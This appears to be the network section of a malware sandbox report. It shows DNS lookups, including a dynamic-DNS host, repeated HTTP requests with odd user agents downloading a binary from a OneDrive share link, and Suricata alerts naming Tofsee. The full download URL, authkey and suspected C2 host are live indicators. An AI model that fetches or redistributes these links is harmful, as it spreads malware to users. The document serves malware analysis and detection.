Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
twistednerd.dvrlists.com | 62.102.148.152 | |
ya5qxq.sn.files.1drv.com | CNAME sn-files.fe.1drv.com; CNAME l-0003.l-msedge.net; 13.107.42.12 | |
onedrive.live.com | CNAME l-0004.l-msedge.net; 13.107.42.13 | |
UDP Requests
- 192.168.56.102:52062 -> 164.124.101.2:53
- 192.168.56.102:52336 -> 164.124.101.2:53
- 192.168.56.102:58838 -> 164.124.101.2:53
- 192.168.56.102:64034 -> 164.124.101.2:53
- 192.168.56.102:64472 -> 164.124.101.2:53
- 192.168.56.102:64995 -> 164.124.101.2:53
- 192.168.56.102:137 -> 192.168.56.255:137
- 192.168.56.102:138 -> 192.168.56.255:138
- 192.168.56.102:49152 -> 239.255.255.250:3702
- 192.168.56.102:49164 -> 239.255.255.250:1900
-
HTTP Requests

GET 302 https://onedrive.live.com/download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21145&authkey=AFt5mXo5_hIU9Wo

Request:

```http
GET /download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21145&authkey=AFt5mXo5_hIU9Wo HTTP/1.1
User-Agent: zipo
Host: onedrive.live.com
```

Response:

```http
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://ya5qxq.sn.files.1drv.com/y4mWV0lrv_tiHoBpZFLgeGeAoOLHwgJmNqdH0OgjUFuy2BNr8G1IO_HRyR6jrXDrImiFe2QUvT74VBUi5sedcd9fLF9dxoWww6_21cF9mI_hsgFoBYR5C-53tzBarzEgUjh_sHrNCdGK_piD2dAN0Pt76qJhizWP4egLLhy7FriuiAueVsovba7AN1mG-Ds_Hqv63TZr0t6kELXRIsqvIrriA/Zmtabitkattqctosiqoboivzoukwwhu?download&psid=1
Set-Cookie: E=P:PJnPEWBv2Yg=:R2YY22r/pXb9/Ia5SxyORhaOo3W0hNpk56ihHgbTE2k=:F; domain=.live.com; path=/
Set-Cookie: xid=f3dcb26d-9336-4416-8b84-b93f2fe590ad&&RDE42AAC88C842&292; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sat, 04-Sep-2021 03:14:25 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Sat, 11-Sep-2021 04:54:26 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: RDE42AAC88C842
X-ODWebServer: canadacentral0-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: E4C62B59F02447348C07E35B9C97A0A5 Ref B: SLAEDGE1116 Ref C: 2021-09-04T04:54:25Z
Date: Sat, 04 Sep 2021 04:54:26 GMT
Content-Length: 0
```
GET 200 https://ya5qxq.sn.files.1drv.com/y4mWV0lrv_tiHoBpZFLgeGeAoOLHwgJmNqdH0OgjUFuy2BNr8G1IO_HRyR6jrXDrImiFe2QUvT74VBUi5sedcd9fLF9dxoWww6_21cF9mI_hsgFoBYR5C-53tzBarzEgUjh_sHrNCdGK_piD2dAN0Pt76qJhizWP4egLLhy7FriuiAueVsovba7AN1mG-Ds_Hqv63TZr0t6kELXRIsqvIrriA/Zmtabitkattqctosiqoboivzoukwwhu?download&psid=1

Request:

```http
GET /y4mWV0lrv_tiHoBpZFLgeGeAoOLHwgJmNqdH0OgjUFuy2BNr8G1IO_HRyR6jrXDrImiFe2QUvT74VBUi5sedcd9fLF9dxoWww6_21cF9mI_hsgFoBYR5C-53tzBarzEgUjh_sHrNCdGK_piD2dAN0Pt76qJhizWP4egLLhy7FriuiAueVsovba7AN1mG-Ds_Hqv63TZr0t6kELXRIsqvIrriA/Zmtabitkattqctosiqoboivzoukwwhu?download&psid=1 HTTP/1.1
User-Agent: zipo
Host: ya5qxq.sn.files.1drv.com
Connection: Keep-Alive
```

Response:

```http
HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 582656
Content-Type: application/octet-stream
Content-Location: https://ya5qxq.sn.files.1drv.com/y4m-CR8ujAKFMEnj2yg8698JJ3QNw5T0n5iUyMrlBuVD9VQEgUKRJfVTVF0gYoqPj2FlJZ4RbzSW3x1nFxdE-DzjDylq6h3m-_4VsEp88RHn7XoDHhhr3oIgwnE_zWTDaxUKntfgFtx5yAJbtfPPDZZ-9gplsAbsUSgehPedqBZXADYzsGmOxQ7lpRfeg4ksW3D
Expires: Fri, 03 Dec 2021 04:54:27 GMT
Last-Modified: Fri, 03 Sep 2021 14:33:10 GMT
Accept-Ranges: bytes
ETag: D6676A9A61E841F3!145.2
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-MSNSERVER: SN3PPF727CA4893
Strict-Transport-Security: max-age=31536000; includeSubDomains
MS-CV: j7gO2WkISE6ppSqCkb/VAw.0
X-SqlDataOrigin: S
CTag: aYzpENjY3NkE5QTYxRTg0MUYzITE0NS4yNTc
X-PreAuthInfo: rv;poba;
Content-Disposition: attachment; filename="Zmtabitkattqctosiqoboivzoukwwhu"
X-Content-Type-Options: nosniff
X-StreamOrigin: X
X-AsmVersion: UNKNOWN; 19.749.824.2003
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: ECAC8915453544898FADFF11F9535953 Ref B: SLAEDGE1120 Ref C: 2021-09-04T04:54:27Z
Date: Sat, 04 Sep 2021 04:54:26 GMT
```
GET 302 https://onedrive.live.com/download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21145&authkey=AFt5mXo5_hIU9Wo

Request:

```http
GET /download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21145&authkey=AFt5mXo5_hIU9Wo HTTP/1.1
User-Agent: aswe
Host: onedrive.live.com
Cache-Control: no-cache
Cookie: E=P:PJnPEWBv2Yg=:R2YY22r/pXb9/Ia5SxyORhaOo3W0hNpk56ihHgbTE2k=:F; xid=f3dcb26d-9336-4416-8b84-b93f2fe590ad&&RDE42AAC88C842&292; xidseq=1; wla42=
```

Response:

```http
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://ya5qxq.sn.files.1drv.com/y4mhkdES2FrzkTr6_ft2vmvKfb9bGMafvF6erpDGpYTyyTou4wOYM--o-pDpWFRoe7XtvHGmX-j_fZ9jW-sMy0xF9LNy6xYLxCqh457rSVvRZ9mXnrhAbWBC7JoY6cVQXsaxJXaqxeEx9ypdygh-0x4PHsyE4Rqwgt5FVSoogr_d7kT53WzOlK4QTYdvaXtyMutkLvh5570BfFK65a9VkcfOA/Zmtabitkattqctosiqoboivzoukwwhu?download&psid=1
Set-Cookie: E=P:ihL6EmBv2Yg=:6r2uVR8+nwEHaGvVOvvG0D/RSGO2Dzbc011dXpgrQj0=:F; domain=.live.com; path=/
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sat, 04-Sep-2021 03:14:27 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Sat, 11-Sep-2021 04:54:27 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: RDE42AAC88C842
X-ODWebServer: canadacentral0-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: CC89F0DDA989482D9E610A0565AE86D3 Ref B: SLAEDGE1116 Ref C: 2021-09-04T04:54:27Z
Date: Sat, 04 Sep 2021 04:54:27 GMT
Content-Length: 0
```
GET 200 https://ya5qxq.sn.files.1drv.com/y4mhkdES2FrzkTr6_ft2vmvKfb9bGMafvF6erpDGpYTyyTou4wOYM--o-pDpWFRoe7XtvHGmX-j_fZ9jW-sMy0xF9LNy6xYLxCqh457rSVvRZ9mXnrhAbWBC7JoY6cVQXsaxJXaqxeEx9ypdygh-0x4PHsyE4Rqwgt5FVSoogr_d7kT53WzOlK4QTYdvaXtyMutkLvh5570BfFK65a9VkcfOA/Zmtabitkattqctosiqoboivzoukwwhu?download&psid=1

Request:

```http
GET /y4mhkdES2FrzkTr6_ft2vmvKfb9bGMafvF6erpDGpYTyyTou4wOYM--o-pDpWFRoe7XtvHGmX-j_fZ9jW-sMy0xF9LNy6xYLxCqh457rSVvRZ9mXnrhAbWBC7JoY6cVQXsaxJXaqxeEx9ypdygh-0x4PHsyE4Rqwgt5FVSoogr_d7kT53WzOlK4QTYdvaXtyMutkLvh5570BfFK65a9VkcfOA/Zmtabitkattqctosiqoboivzoukwwhu?download&psid=1 HTTP/1.1
User-Agent: aswe
Host: ya5qxq.sn.files.1drv.com
Cache-Control: no-cache
Connection: Keep-Alive
```

Response:

```http
HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 582656
Content-Type: application/octet-stream
Content-Location: https://ya5qxq.sn.files.1drv.com/y4m-CR8ujAKFMEnj2yg8698JJ3QNw5T0n5iUyMrlBuVD9VQEgUKRJfVTVF0gYoqPj2FlJZ4RbzSW3x1nFxdE-DzjDylq6h3m-_4VsEp88RHn7XoDHhhr3oIgwnE_zWTDaxUKntfgFtx5yAJbtfPPDZZ-9gplsAbsUSgehPedqBZXADYzsGmOxQ7lpRfeg4ksW3D
Expires: Fri, 03 Dec 2021 04:54:28 GMT
Last-Modified: Fri, 03 Sep 2021 14:33:10 GMT
Accept-Ranges: bytes
ETag: D6676A9A61E841F3!145.2
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-MSNSERVER: SN4PPF4640852D9
Strict-Transport-Security: max-age=31536000; includeSubDomains
MS-CV: zLI2pZbTNE6yeBOBnrn0uA.0
X-SqlDataOrigin: S
CTag: aYzpENjY3NkE5QTYxRTg0MUYzITE0NS4yNTc
X-PreAuthInfo: rv;poba;
Content-Disposition: attachment; filename="Zmtabitkattqctosiqoboivzoukwwhu"
X-Content-Type-Options: nosniff
X-StreamOrigin: X
X-AsmVersion: UNKNOWN; 19.742.813.2004
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: 1BFBADBD855D446C940B769D52BD7FE2 Ref B: SLAEDGE1118 Ref C: 2021-09-04T04:54:27Z
Date: Sat, 04 Sep 2021 04:54:27 GMT
```
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49165 -> 13.107.42.12:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49164 -> 13.107.42.13:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49166 -> 13.107.42.12:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49164 -> 13.107.42.13:443 | C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01 | CN=onedrive.com | 50:2f:33:10:92:ac:27:7b:17:be:82:68:3b:e2:29:ad:97:41:b7:bb |
TLSv1 192.168.56.102:49165 -> 13.107.42.12:443 | C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com | ec:e5:02:98:e6:c9:9a:12:fc:c0:4d:19:cd:2b:0c:ae:d0:c0:37:8e |
TLSv1 192.168.56.102:49166 -> 13.107.42.12:443 | C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 01 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com | ec:e5:02:98:e6:c9:9a:12:fc:c0:4d:19:cd:2b:0c:ae:d0:c0:37:8e |
Snort Alerts
No Snort Alerts